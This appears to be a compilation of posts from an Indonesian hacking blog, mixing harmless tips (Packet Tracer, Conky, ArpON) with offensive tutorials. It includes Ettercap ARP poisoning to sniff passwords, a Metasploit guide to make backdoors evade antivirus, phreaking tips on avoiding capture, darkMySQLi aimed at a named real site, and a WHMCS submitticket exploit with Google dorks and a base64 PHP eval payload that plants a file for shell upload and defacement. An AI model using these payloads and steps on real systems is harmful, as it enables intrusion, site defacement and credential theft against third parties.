Wildan Yani Ashari di Rekrut Cyber Crime Indonesia?

Kabar gembira buat para Hacker Indonesia, tersanka peretas website Presiden SBY, Wildan Yani Ashari direkrut team cyber crime. Entah benar atau tidak kabar ini, tapi dengan adanya foto yang ada dalam akun facebooknya. Menunjukan bahwa MJL007 a.k.a Wildan Yani Ashari sedang asik dikantor team cyber crime mabes polri.

Berikut Foto Wildan di kantor barunya :










Foto ini saya ambil dari facebook milik wildan. sayangnya saya belum ijin untuk mengambil dan mengepostnya pada blog saya.

Karbar gemberinya lagi, Wildan akan mendapat Beasiswa. "Hacker muda Wildan memiliki kompetensi. Karena tidak terbina malah bukan menjaga keamanan. Menyarankan beliau dibina dan diberi beasiswa," kata Mardani. Untuk para hacker indonesia, tolong hentikan #OP untuk MJL007, itu mandat dari Unwanted sewaktu jadi admin Jember Hacker Team, tapi sekarang di pensiun tanpa alasan.

Ok, salut deh untuk Bro Wildan. Saya tambahin, chating terakhir dengan si MJL007.

Saya : asamulaikum mas bero... gimana kabar ente disitu?
Wildan :fine2 ajja sob
Saya : udah kena gampar blum bro?
Wildan : hahah ea gak lah malah ane d enak2in dsini
Saya : mantap. ikutan donk
wildan : sini ikut d ciduk jg hahahah
Saya : hohoho.... ogah. repot entar nih rumah nggk ada yang urus hehe

Tutorial Mudah Cisco Packet Tracer

Halo sobat bloger, kali ini akan mencoba membahas tentang Cisco Packet Tracer. Ada yang tau apa sih Cisco Packet Tracer? Dan fungsinya apa? Ga tau kan? Oke akan dibahas singkat ya.
Cisco Packet Tracer sendiri yaitu sebuah program yang di kembangkan oleh Cisco. Dimana program tersebut berfungsi untuk membuat suatu jaringan komputer atau lebih sering di sebut computer network. Dalam program ini telah tersedia beberapa komponen atau alat-alat yang sering dipakai atau digunakan dalam system network tersebut. Contoh HUB,SWITCH,ROUTER,Kabel LAN dan sebagainya. Sehingga dengan mudah kita dapat membuat sebuah sketsa jaringan komputer di dalam pc. Sketsa ini berfungsi untuk mengetahui cara kerja pada tiap alat tersebut dan cara pengiriman sebuah pesan dari komputer 1 ke komputer yang lainnya.
Berikut salah satu contoh desain sebuah Jaringan Router yang di desain menggunakan Cisco Packet Tracer.





Yang ingin mendownload modul Cisco Packet Tracer, bisa download disini !!!


 

VPN PREMIUM FREE 1 BULAN

Selamat Malam Sob, Kali ini saya akan Share VPN PREMIUM FREE, Nah,, setelah survei,, berjalan2 di google. dapatlah VPN PREMIUM secara FREE... nah.. FREE INI selama 30 HARI.. lumayan kan.. wkwkwk.... Software kali sudah saya TEST sendiri.. jadi teman2 semua ga perlu khawatir.. Aplikasi ini BEBAS VIRUS... dan bisa di download dari situs RESMI nya .... :D


Langsung aja :

  • Pertama download dulu aplikasinya DI SINI !!!
    • Sebelum anda download anda akan di arahkan untuk membuat acount.. silahkan buat acount anda
    • Jangan Lupa untuk meng AKTIVE kan acount nya dengan membuka ALAMAT E-MAIL yang anda daftarkan tadi... :Pe contoh gambar :

  • Setelah itu Download lah File nya....
  • Install File nya seperti biasa
  • Setelah di install.. maka anda akan melihat halaman Login seperti ini


  • Isi halaman LOGIN sesuai dengan Acount yg anda daftarkan tadi
  • Jika LOGIN benar.. maka akan tampil seperti ini


  • CEK IP Anda... Apakah berubah atau tidak, jika berubah.. maka trik ini berhasil
  • CEK IP anda DI SINI ,  Ini Contoh IP saya setelah menggunakan TRIK di ATAS...





 
Karena saya menggunakan IP BELANDE maka pas di cek akan berasal dari BELANDE
  • Selamat BER INTERNET dengan AMAN.....
TRIK ini sudah saya Coba sendiri... jadi anda tidak perlu Khawatir... wkwkwk..... Sekian dari saya.. apabila ada yang kurang jelas silahkan komentar...

NOTE :

  • Jika masa berlaku selama 30 HARI sudah berakhir, aplikasi jangan di UNISTALL.. anda tinggal LOG OUT... terus daftar lagi dengan E-MAIL yg berbeda.. nah.. LOGIN dengan ACOUNT yg baru... :D
  • Mungkin ada yang bertanya.. kenapa SAYA CUMA DAPAT FREE 15 HARI saja... nah di sini saya akan menjelaskan.. kalau anda belum mengaktivasi ACOUNT anda dari E-MAIL... maka anda akan dapat CUMA 15 HARI... tapi setelah di aktivasi.. maka masa nya bertambah menjadi 30 HARI , ini saya lampirkan Screen Shot contohnya

Klik foto untuk memperbesar

  • Mungkin SAAT LOGIN agak sedikit lama, karena pertama kali dan sekaligus peng Configurasi nya supaya internet aman.. jadi bersabaar lah.. tapi untuk LOGIN yang ke 2.. cepet kok... hehehee :p

SEMOGA BERMANFAAT

Menyembunyikan IP Dengan VPN di Windows

Asslkm Wr. Wb. 

Dalam sebuah jaringan internet, banyak sekali orang yang ingin mengotak atik IP address orang lain, baik cuma ingin melihat datanya sampai meremote melalui jaringan, nah akhirnya ada referensi yang saya dapat dari Om google yaitu menyembunyikan IP dengan menggunakan VPN (Virtual Private Network).

Pada artikel ini saya menulis karena ada beberapa faktor dan manfaatnya yaitu :

  1. Supaya internet aman
  2. Tidak mudah di lacak IP addrees yang di gunakan

jadi misalkan ada yang ngelacak kita saat berinternet,, maka akan terlacak di negara lain,, tergantung dengan apa yang kita pakai,, IP negara mana yang kita pakai... oke langsung aja, saya jelaskan caranya.

 

# Contoh gambar Penggunaan VPN  

 

   

Langkah2 Menyembunyikan IP :

  • Lihat HOSTNAME, USERNAME & PASSWORD VPN => DISINI
  • Maka akan tampil gambar seperti ini  

  • Kali ini saya menggunakan HOSTNAME, USERNAME & PASSWORD VPN dari Amerika ( US )
  • Masuk ke Start => Control Panel => Network And Sharing Center

  

  • Klik Set up a new connection or network

 

  •  Klik Connect to a workplace => Next

   

  • Pilih Use my internet connection (VPN) => Next

 

  • Isi INTERNET ADDRESS sesuai dengan yang ada di web tadi

 

  • Klik Create, tunggu sebentar sampai Proses pembuatan VPN selesai
  • Maka akan muncul seperti gambar ini :

  • Setelah itu connect ke VPN tadi susuai dengan USERNAME & PASSWORD pada gambar Website di atas.

 

  • Jika sudah connect, maka tampilannya akan seperti ini :

 

  • Cek IP anda, apakah sudah berubah atau tidak, CEK IP => DISINI
  • Contoh IP saya setelah pakai VPN

 

 

eX di atas menggunakan win8

Referensi : google, yadi000.blogspot.com

Hexedit (Metadata From Picture)

Di sini saya akan menggunakan hexedit untuk mencari tau kapan gambar ini diambil, dengan apa gambar in diambil, dengan HP atau WebCam atau camera, apakah gambar ini pernah diedit sebelumnya. oke langsung ajadeh ya ....

Sontoh Gamber nyuuua !!!
[Image: d6f4a310.jpg]

terlihat para ababil sedang berkumpul wakakak kita buka hexedit kita dengan cara

root@xsan:~# hexedit 1.jpg

[Image: 40e27994.png]

terlihat dibagian itu ada tulisan CASIO COMPUTER CO.LTD & GIMP 2.6.8 foto di ambil dengan kamera casio dan gambar telah di edit dengan aplikasi pengolah gambar yg paling powerfull yaitu GIMP

dan kita lihat keterangan berikut ini

[Image: debd9d79.png]

binggo terlihat ada tulisan 09:27:27.2011:05:24

perhatikan tlisan dengan warna kuning itu menunjukan pukul di ambilnya gambar yap masih pagi itu ababil udh maen wakakak

perhatikan tulisan warna merah di atas yoi itu menunjukan Tahun-Bulan- dan Tanggal di ambilnya foto tersebut

okeh sekian dl yaaa perjumpaan kita hehehe maaf kl masih ada salah salah kata wabilahitopik walhidayah wassalamualaikum

xsan-lahci

Dmitry (Deepmagic Information Gathering) tool on BackTrack 5 R3

Sekedar pengenalan aja nich sob !!! nama nya Dmitry !!!!
 
berikut ane kasih liat sedikit tentang Dmitry !!!

[Image: 3mqlH.png]

banyak pilihan
root@bt:~# dmitry
Deepmagic Information Gathering Tool
"There be some deep magic going on"

Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
-o Save output to %host.txt or to file specified by -o file
-i Perform a whois lookup on the IP address of a host
-w Perform a whois lookup on the domain name of a host
-n Retrieve Netcraft.com information on a host
-s Perform a search for possible subdomains
-e Perform a search for possible email addresses
-p Perform a TCP port scan on a host
* -f Perform a TCP port scan on a host showing output reporting filtered ports
* -b Read in the banner received from the scanned port
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )
*Requires the -p flagged to be passed



coba kita IG salah satu site yah, site sahabat ane nih
i use option -i
[Image: di1RU.png]

test port nya apa aja yang terbuka/filter
[Image: Y6gbC.png]

test yang lain lagi dah dg option -w
root@bt:~# dmitry -w juniorriau.com
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:103.28.149.104
HostName:juniorriau.com

Gathered Inic-whois information for juniorriau.com
---------------------------------
Domain Name: JUNIORRIAU.COM
Registrar: CLOUD GROUP LIMITED
Whois Server: whois.hostingservicesinc.net
Referral URL: http://www.resell.biz
Name Server: NS1.CODEWALL-SECURITY.COM
Name Server: NS2.CODEWALL-SECURITY.COM
Status: clientTransferProhibited
Updated Date: 13-sep-2012
Creation Date: 11-sep-2012
Expiration Date: 11-sep-2013

udah ah takut di marahin orang yang punya
dadah pamit mau belajar lagi

TTD
wine

Ettercap GUI Terminal on Backtrack

Share ya broo... Bagi temen-temen yang kurang *ngeh dengan Ettercap CLI, saya ingin berbagi Ettercap versi GUI yang running dalam terminal? Gimana tuh ?
Aku sendiri juga bingung memberi namanya gimana . hehehe

So, langsung aja deh kita praktek

Untuk membuka ettercap kaya yang saya ceritain datas, buka terminal bro...
#bukanterminalbis
yaa..

Quote:Ettercap -i interfaceYgDigunakan -C

Sebenarnya temen-temen bisa menggunakan ettercap -C saja, namun kendala yang saya temukan adalah ketika memilih inteface yang akan digunakan.

Oke, tampilan nya kira kira kaya gini broo...
Spoiler! :
[Image: ettercap1.png]
Gimana mirip gak ama yang GUI ? hehehe...

habis itu tinggal MITM aja broo,, mau sniffing , mau arp poisoning , dhcp spoofing dan yang lainnya terserah broo...
Seperti biasa broo, kalo lagi MITM, check bro kira-kira sukses gak racun yang kita luncurkan broo....

Biasa untuk sniffing password , kita gunakan ARP Poisoning. Oh ya udah tau ARP belum bro ? ARP itu Address Resolution Protcol , fungsinya memetakkan MAC Address berdasarkan IP / Packet ICMP juga bisa. Jadi ARP Poisoning ini intinya adalah meracuni si korban agar mengirimkan packet ke MAC address yang sudah tidak asli bro..
#analogi
nya kaya orang mabuk, dia susah ngeliat jalan .

Nah karena sudah diracuni, maka paket tadi mampir ke Komputer kita bro, alhasil dapet deh informasi yang dikirimkan..


Untuk memulai ARP Poisoning dalam Ettercap, yang perlu kita lakuin adalah :

Quote:1. Scan Host, tentukan korban.
Spoiler! :
[Image: ettercap2.png]
[Image: ettercap3.png]

#optional
addition

Spoiler! :
buka /usr/local/etc/etter.conf
# if you use iptables:
#redir_command_on
= “iptables -t nat -A PREROUTING -i %iface -p tcp –dport $
#redir_command_off
= “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$

di Uncomment bro, (dihilangkan tanda #) di dua baris terakhir.


Sehingga menjadi
Spoiler! :

# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport $
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$


Quote:2. di Menu MITM, pilih yang ARP Poisoning
Spoiler! :
[Image: ettercap4.png]

Quote:3. Start Sniffing
Spoiler! :
[Image: ettercap5.png]
CMIIW
Copyright © NjepatCrew | 2013

Instal conky di bactrack 5r3

selamat malem sobat, jumpa lagi ni,maaf sob baru nongol,
soalnya kemaren lagi sibuk kuliah ekekekekekek....

oke sob kali ini ane cuma pengen share cara instal conky di backtrack 5r3
langsung aja ya sob ni caranya :
 sebelumnya kalo belum instal conky di backtrack langsung instal aja

buka console kemudian ketik :

~#sudo apt-get install conky (kalo udah tekan enter)

tunggu hingga proses instalasi selesai.
kalo udah selesai langsung kita ke tahap pemasangan conky
berikut caranya cekibrot:

1.  download dulu tema Conky 8-2core nya di sini :
        download

2. kalo selesai download sekarang ekstrak file yg di donlot td.
    Tekan CTRL+H buat nampilin hidden file.

3. copy folder .conky ke home direktori user.  misal /home/Seno.
    klo ane disini masih pake user root.  jd ane copy ke /root.

4. skrang tinggal kita run aja conkynya. disini ada 3 varian jenisnya.
     ketik di terminal :

~#conky -c ~/.conky/conkyrc_8a
atau
~#conky -c ~/.conky/conkyrc_8b
atau
~#conky -c ~/.conky/conkyrc_8c

pilih aja sesuai selera.

5. biar conky bisa run pas start up.

> klik system > preferences > startup aplications > add

kemudian isikan dengan kode berikut

Name: start conky
command: sh -c "sleep 10s; conky -c ~/.conky/conkyrc_8a"
comment: conky


berikut ane kasih contoh conky di tempat ane ekekekekek


selain di backtrack,conky ini juga bisa dipasang di distro linux lainnya seperti ubuntu,fedora dll

oke mungking sekian dulu yang ane share
ketemu lagi di laen kesempatan

Membuat backdoor undetectable di Metasploit Framework

Hari ini kita akan melakukan enkripsi backdoors dengan menggunakan metasploit framework di Backtrack 5! 

Pertama kita lihat kerajinan muatan sederhana menjadi backdoor, dan ketika loading ke dalam sandbox (Windows XP) anti-virus tidak mengijinkan file yang kita buat untuk didownload.

Well, that’s not any good is it? sapa coba yang mau membukanya kalo dah ada peringatan?

jadi,kita harus buat file ini jadi undetectable, n target kita menggunakan anti-virus Avast. Baru saja saya menemukan script publik di Pastebin (>o<)n setelah melihat ni selama beberapa menit,menurutku nu file paling pas. terutama setelah melihatbaris ke 43… jadi ku ubah deh supaya bisa kupake sendiri —  don’t know who you are or where you’re from but keep it up! 

Pertama, install ni:
apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

jalanin metasploit framework console, gunakan exploit/multi/handler method, n set the payload untuk windows/meterpreter/reverse_https.Ini juga merupakan ide yang baik untuk menggunakan script ‘launch_and_migrate.rb’, jadi kita bisa pidah ke proses berikutnya setelah kita dapat peluang. Kita encoded backdoornya 1000 kali sampai tidak stabil.

Dengan kemampuan backdoor yang tidak terdeteksi, tingkal kreatifnya kita buat  buat nyebarin.

download skripnya disini: [ DOWNLOAD ]
ni videonya

Anti NetCut " APRON "

Oke, bertele - telenya sudah..
Kita lanjut....



1. Install arpon
Code:
sudo apt-get install arpon

2. Konfigurasi arpon
Code:
sudo gedit /etc/default/arpon

Ganti isi file /etc/default/arpon
Menjadi. . .
Spoiler! :

Code:
# Defaults for arpon initscript
# sourced by /etc/init.d/arpon
# installed at /etc/default/arpon by the maintainer scripts
# You must choose between static ARP inspection (SARPI) and
# dynamic ARP inspection (DARPI)
#
# For SARPI uncomment the following line
DAEMON_OPTS=”-d -f /var/log/arpon/arpon.log -g -s”
# For DARPI uncomment the following line
# DAEMON_OPTS=”-d -f /var/log/arpon/arpon.log -g -y”
# Modify to RUN=”yes” when you are ready
RUN=”yes”


3. Save, Exit.

4. Jalankan arpon
- Help Text
Spoiler! :
Code:
root@riftrick:~$ arpon

  ArpON "Arp handler inspection" version 1.90 (http://arpon.sourceforge.net)

  Usage: arpon [Task Mode] [Log Mode] [Device] {[Arping] | [Sniffer] | [Arp Cache] | [SARPI | DARPI]} [Misc]

  TASK MODE:
    -n, --nice           <Nice Value>    Sets PID's CPU priority
                                         (Default Nice: 0)
    -d, --daemon                         Works in background task
                                         (Default: /var/run/arpon.pid)
  LOG MODE:
    -f, --log-file       <Log file>      Sets log file
                                         (Default: /var/log/arpon.log)
    -g, --log                            Works in logging mode

  DEVICE MANAGER:
    -i, --dev-manual     <Device>        Sets your valid device manually
    -o, --dev-auto                       Sets valid device automatically
    -l, --dev-list                       Prints all valid devices
                                         (Sets last valid device)
  ARP PING:
    -m, --ping-timeout   <Timeout>       Sets Arp Ping response timeout
                                         (Default: 500 milliseconds)
    -p, --ping-host      <Inet4>         Sends Arp Ping to Inet4 address
    -b, --ping-broadcast                 Sends Arp Ping to Broadcast address
                                         (Prints LAN's active hosts)
  ARP PASSIVE SNIFFER:
    -r, --sniff-arp                      Sniffs only Arp protocol
                                         (I/O Arp Request/Reply)
  ARP CACHE MANAGER:
    -a, --cache-add      <"Inet4  MAC">  Adds Inet4 and MAC Arp entry
    -e, --cache-del      <Inet4 | MAC>   Deletes Inet4 or MAC Arp entry
    -t, --cache-list                     Prints total ARP Cache entries

  STATIC ARP INSPECTION:
    -u, --sarpi-timeout  <Timeout>       Sets Arp Cache refresh timeout
                                         (Default: 10 minuts)
    -s, --sarpi                          Manages Arp Cache statically

  DYNAMIC ARP INSPECTION:
    -z, --darpi-timeout  <Timeout>       Sets DARPI Cache entry timeout
                                         (Default: 500 milliseconds)
    -y, --darpi                          Manages Arp Cache dinamically

  MISC:
    -c, --license                        Prints license page
    -v, --version                        Prints version number
    -h, --help                           Prints help summary page

  SEE THE MAN PAGE FOR MANY DESCRIPTIONS AND EXAMPLES

root@riftrick:~$


- Jalankan arpon statik dengan koneksi wlan0
Spoiler! :

Code:
sudo arpon -i wlan0 -s


- Jalankan arpon statik dengan koneksi eth0
Spoiler! :

Code:
sudo arpon -i eth0 -s


- Jalankan arpon dinamik dengan koneksi wlan0
Spoiler! :
Code:
sudo arpon -i wlan0 -y


- Jalankan arpon dinamik dengan koneksi eth0
Spoiler! :
Code:
sudo arpon -i eth0 -y


- Jalankan arpon statik dengan koneksi wlan0 [Background]
Spoiler! :
Code:
sudo arpon -i wlan0 -s -d


- Jalankan arpon statik dengan koneksi eth0 [Background]
Spoiler! :
Code:
sudo arpon -i eth0 -s -d


- Jalankan arpon dinamik dengan koneksi wlan0 [Background]
Spoiler! :
Code:
sudo arpon -i wlan0 -y -d


- Jalankan arpon dinamik dengan koneksi eth0 [Background]
Spoiler! :
Code:
sudo arpon -i eth0 -y -d


5. Yap, linux anda sudah dilengkapi AntiNetcut Smile

Inspirated  by THJC

Pengertian Phreaking

-------PHREAKING-------
[Image: phreaking_design.png]


Phreaker, Mungkin jarang di Indonesia yang pernah mendengar kata ini. Phreaker ini sebenarnya hampir sama sifatnya dengan cracker dimana sama-sama menyukai GRATISAN. Bedanya Phreaker lebih fokus ke dalam bug jaringan/telekomunikasi. Contoh mudahnya orang bisa menelpon gratis padahal seharusnya berbayar, atau contoh lainnya seseorang menggunakan bug yang ada didalam sebuah perusahaan telekomunikasi (meskipun tidak diketahui bocornya informasi ini hasil sendiri atau diberi tahu orang dalam) itu adalah salah satu kegiatan phreaking dan orang yang melakukannya di sebut phreaker.

Phreaking adalah praktek hacking menggunakan telepon, atau mempergunakan media telepon atau peralatan telepon agar si pelaku bisa masuk ke sistem tersebut. Di negara kita phreaking ini belum begitu populer dilakukan.

Sifat dari phreaking ini sebenarnya akan sangat berhasil bila dikombinasikan dengan teknik Social Engineering adalah bersifat menipu lewat percakapan ditelepon agar dia bisa diberikan izin akses langsung dari si pemilik/si pengelolah sistem ke sistem yang dituju tersebut. Contoh Phreaking dikombinasikan Social Engineering ; Sudah 14 hari anda melakukan hacking tapi sayang tidak berhasil, selanjutnya anda menelpon dan minta izin masuk ke server itu seolah-olah anda adalah bos dari kantor pusat di Jakarta yang sedang mencari data perusahaan dan dia mematuhi anda dan segera memberikan anda izin untuk masuk ke server itu,...selanjutnya cling, anda sukses.

Aturan-aturan Phreaking :
Quote:- Jangan menggunakan telepon rumahmu untuk hal yang ini.
- Janglahlah berbicara mengenai suatu proyek phreaking ditelepon rumahmu.
- Jangan gunakan nama aslimu saat phreaking.
- Berhati-hatilah kepada siapa kamu menceritakan proyek phreaking’mu itu.
- Jangan sampai terlihat benda-benda untuk phreaking’mu itu. Simpanlah ditempat aman.
- Jangan sampai tertangkap atau tersadap.


mungkin segitu udah cukup buat pengertian apa itu yg dimaksud dengan
phreaking.. hehehe

WHMCS Exploit Submit Ticket

oke, bertemu lagi dengan saya
kali ini saya akan mengaasih tau cara exploit submit ticket WHMCS
sebetulnya di google udah banyak kaya gini ..
mending kita langsung saja dah ke cara''nya:
dork:
Quote:intext:Powered by WHMCompleteSolution inurl:submitticket.php
intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php
intext:Powered by WHMCompleteSolution inurl:client/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php
intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php
intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php
intext:Powered by WHMCompleteSolution inurl:member/submitticket.php
intext:Powered by WHMCompleteSolution inurl:members/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
intext:Powered by WHMCompleteSolution inurl:support/submitticket.php
intext:Powered by WHMCompleteSolution inurl:help/submitticket.php
intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php
intext:Powered by WHMCompleteSolution inurl:store/submitticket.php
intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php
intext:Powered by WHMCompleteSolution inurl:log/submitticket.php
intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php
intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php
intext:Powered by WHMCompleteSolution inurl:order/submitticket.php
intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php
intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
intext:Powered by WHMCompleteSolution inurl:office/submitticket.php
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info
intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"
intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"

Steb By Step :

1 : Gunakan pencarian google menggunakan salah satu Dork Diatas ,,


2: Cari Web yang kira" bisa " Ga Semua Bsa Ibaratkan Nasib"pan ( tergantung hoki hokian gan )
Contoh http://www.TARGET.com/client/submitticket.php

Nih contoh SS nya :

[Image: 15920778f04dd97a72a5bd9bcb0d3546c965670e.jpg]

3: yap udah dapet targetnya sekarang saatnya kirim ticketnya ..
Taruh code php ini di Form Nama , subject , isi . ( untuk yang email , ngasal aja )

code phpnya :
Quote:{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt='));{/php})

gini jadi nya :
[Image: image.jpg]

mari kita cek berhasil apa kaga

ganti url submitticket.php jadi /templates/jxh.php

Contoh : http://www.TARGET.com/client/templates/jxh.php

nih contoh nya :
[Image: image.jpg]

nah Sudah dsitu Tinggal Kita Upload Shell aja Atau Mau Upload apa aja Terserah ente

Kalau Sudah Kita Upload Disini Kita akan Melihat Shell Kita upload tadi

Contoh : http://www.TARGET.com/client/templates/jxh.php <-- kita ganti yg jxh.php menjadi nama shell kita upload tadi semisal froge.php

jadi gini :
[Image: image.jpg]

skarang web tersebut ada di tangan anda,
seterah mau tusbol indexnya mau perkosa kek
pokoknya seterah anda

sumber : akiramitsu  indonesianredhat

Shere Domain Gratis Dan Hosting Gratis

Berikut adalah daftar Domain Gratis & URL Redirection/Cloacking (Penyamar) Gratis...
1. co.cc
http://www.co.cc/
2. uni.cc
http://www.uni.cc/site/login.php
3. cz.cc
http://www.nic.cz.cc/
4. co.tv
http://www.co.tv/
5. rr.nu
http://www.sitelutions.com/signup
6. eu.org
http://www.eu.org/form_n.html
7. yi.org
http://www.yi.org/reg.pl
8. bee.pl
http://www.bee.pl/index.htm
9. biz.ly (Include Free Hosting)
http://www.biz.ly/
10. mx.am
http://www.createnic.de/
11. tk
http://www.dot.tk/en/index.html?lang=en
12. co.nr
http://www.freedomain.co.nr/
13. da.ru
http://www.da.ru/
14. nic.biz.ly
http://nic.biz.ly/
15. za.org
http://www.za.org/
16. co.za
http://co.za/
17. cjb.net
http://www.cjb.net/
18. eu.nu, web.gg, us.nf, int.nf, tv.gg, co.gp, online.gp, asia.gp, biz.uz, pro.vg, name.vu, info.nu, edu.ms or mobi.ps
http://www.subdomain.com
19. eu.ki
http://www.eu.ki/
20. coz.cc & cq.bz
http://www.c-o.in
21. eu.tf, net.tf belakang-belakangnya .tf
http://www.unonic.com/
22. 8rf.com
http://www.freewebdirectorysubmit.com/Co...te/8rf.com
23. sama kayak unonic.com (Mungkin ini pakai Clone Script)
http://www.smartdots.com
24. shim.net
http://www.shim.net/
25. n3t.nl
http://www.f2b.be/__redirection__/
26. here.ws dan true.ws dan .ws lainnya
http://www.active.ws/domains/
27. ubb.cc
http://ubb.cc/
28. cw.cm
http://registry.cw.cm

Googling aja...


Web Hosting Gratis
/*** Free PHP Web Hosting ***/
Fitur : VistaPanel, Script Installer, Disk & Bandwith Analyzer, Etc
Banner & Ads : Ada yang Ada, Ada yang Enggak.

Catatan : Kebanyakan Web Hosting di bawah ini, memiliki provider yang sama/tunggal (Byethost)

Alamat WebHosting Space Bandwith
http://www.000a.biz 11000MB 400GB
http://frostbytez.com/order/ 10000MB 10GB
http://thatsepic.tk/test.html 10000MB 75GB
http://www.host1free.com 10000MB 150GB
http://www.surge8.com/ 8000MB 30GB
http://www.freei.me/ 7000GB 250GB
http://zoka.cc 7000MB 250GB
http://www.freeweb7.com/ 7000MB 70GB
http://zymic.com 6000MB 50GB
http://www.000free.us/ 5500MB 200GB
http://www.000space.com/ 5500MB 200GB
http://www.00free.net/ 5500MB 200GB
http://www.0down.us/ 5500MB 200GB
http://www.123bemyhost.com 5500MB 200GB
http://www.200gigs.com/ 5500MB 200GB
http://50gigs.net/ 5500MB 200GB
http://www.bigfreehost.net/ 5500MB 200GB
http://www.bigfreephp.com/ 5500MB 200GB
http://byethost.com 5500MB 200GB
http://www.coolwwweb.com/ 5500MB 200GB
http://www.filezoka.com/ 5500MB 200GB
http://www.freebyte.us/ 5500MB 200GB
http://www.freeforme.us/ 5500MB 200GB
http://www.freehostee.com/ 5500MB 200GB
http://www.freehostrocket.com/ 5500MB 200GB
http://www.freeinternet.cc/ 5500MB 200GB
http://www.hostmefree.org/ 5500MB 200GB
http://www.mysql50.com/ 5500MB 200GB
http://www.noadsfree.com/ 5500MB 200GB
http://www.phpzilla.net/ 5500MB 200GB
http://www.tldhost.net/ 5500MB 200GB
http://xtreemhost.com/ 5500MB 200GB
http://www.5freehost.com 5000MB UNLIMITED
http://www.20x.cc 5000MB 200GB
http://www.5gb.cc/ 5000MB 200GB
http://www.5gigs.net/ 5000MB 200GB
http://icr38.net/ 5000MB 200GB
http://www.my5gigs.com/ 5000MB 200GB
http://www.oni.cc/ 5000MB 200GB
http://www.prophp.us/ 5500MB 200GB
http://www.x50.cc/ 5000MB 200GB
http://0cost.me 5000MB 50GB
http://www.5gighost.com/ 5000MB 20GB
http://www.blackapplehost.com/ 5000MB 20GB
http://fr33webhosting.com/ 5000MB 20GB
http://www.fizwig.com/ 5000MB 10GB
http://www.freewebhostx.com/ ?????? 10GB
http://www.pinghoster.com ?????? ?????
http://www.t35.com/ ?????? ?????

Kalau ada yang mw nambahin, silahkan...... Sumber : JenzDvL indonesianredhat

darkMySQLI tutorial !!!

Tools ini mungkin memang sudah lama.. tapi berhubung ada di backtrack 5 jadi.. saya mau shere dsini ...

langsung saja ya broow

Directory kalian sob !

Code:
/pentest/web/darkmysqli

Next :

Code:
root@riftrick{/pentest/web/darkmysqli}:ls
./  ../  darkMySQLi.log  DarkMySQLi.py
root@riftrick{/pentest/web/darkmysqli}:

kebetulan dapet situs yang vurln bakal saya jadi in contoh disini :

Code:
http://www.nationalzoo.si.edu/news.php?id=720'

Spoiler! :
root@riftrick{/pentest/web/darkmysqli}:python DarkMySQLi.py --help

darkMySQLi v1.6 ensue1@gmail.com
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information

Target:
-u URL, --url=URL Target url

Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
